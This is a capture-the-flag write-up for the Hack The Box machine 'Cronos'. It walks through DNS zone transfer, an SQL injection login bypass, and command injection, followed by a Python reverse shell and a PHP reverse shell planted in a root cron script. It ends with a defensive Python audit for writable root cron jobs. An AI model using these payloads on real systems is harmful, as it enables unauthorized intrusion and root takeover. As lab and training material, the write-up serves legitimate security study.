Service Enumeration -H -t all
We can perform a DNS zone transfer, guessing that the domain is cronos.htb:
dig axfr @ cronos.htb
Here, we uncover some subdomains for Let's add them to our /etc/hosts file.
Now, going to www.cronos.htb and admin.cronos.htb yields a valid webpage.


The admin.cronos.htb login page is vulnerable to SQL injection. Using the payload:
username=' or 1=1;#&password=
we can bypass the authentication. Note that this does not work on the password field.
We get access to the following tool:
If we examine the POST request, we see that ping -c 1 is sent as the command parameter. It is possible that the server does not sanitize this input and places the command parameter directly into the OS command it runs.
Indeed, changing to -c 2 changes the command executed!
We now have an RCE vulnerability. Executing the which python command shows that Python is installed on the server.
We can use a Python reverse shell payload:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
After URL encoding, we can edit the command parameter:
On our Netcat listener, we receive the reverse shell.

Privilege Escalation

We can use LinPEAS to enumerate.
We find the following cron job that runs every minute:
The script run is a PHP script:
We can change this to our custom PHP payload:
<?php $sock=fsockopen("",4242); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
The next time the cron job is run, we obtain a root shell on our listener.
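The root cause of this escalation is a root cron job that executes a script a non-root account can modify. The following audit is an added example, not part of the original write-up: it parses /etc/crontab-style lines and reports root jobs whose script, or any parent directory, is writable by an account other than root. The crontab entry and the /var/www/app paths are constructed placeholders, since the page does not show the real entry.

```python
import os
import stat

# Constructed sample in /etc/crontab format; the page does not show the real entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/app/task.php >> /dev/null 2>&1
*/5 * * * * www-data php /var/www/app/cleanup.php
"""

def root_job_paths(crontab_text):
    """Yield each absolute path named in a command that cron runs as root."""
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 6)   # 5 time fields, user, command
        if len(fields) < 7 or fields[0].startswith("#") or fields[5] != "root":
            continue
        for token in fields[6].split():
            if token.startswith("/") and not token.startswith("/dev/"):
                yield token

def writable_by_non_root(st):
    """True if an account other than root can modify the file or directory."""
    if st.st_uid != 0:
        return True                             # the owner can always write or chmod
    if st.st_mode & stat.S_IWOTH:
        return True
    return bool(st.st_mode & stat.S_IWGRP) and st.st_gid != 0

def audit(crontab_text, stat_fn=os.stat):
    """Return (script, weak_component) pairs for root cron jobs a non-root user can alter."""
    findings = []
    for path in root_job_paths(crontab_text):
        node = path
        while True:                             # check the file, then every parent directory
            try:
                if writable_by_non_root(stat_fn(node)):
                    findings.append((path, node))
                    break
            except OSError:
                pass                            # component missing on this host
            if node == "/":
                break
            node = os.path.dirname(node)
    return findings

if __name__ == "__main__":
    for script, weak in audit(SAMPLE_CRONTAB):
        print(f"root cron job uses {script}: {weak} is writable by a non-root account")
```

On a real host, pass the contents of /etc/crontab and the files in /etc/cron.d to audit(); any finding should be fixed by making the script and its directories root-owned and not group- or world-writable, or by running the job as the unprivileged user.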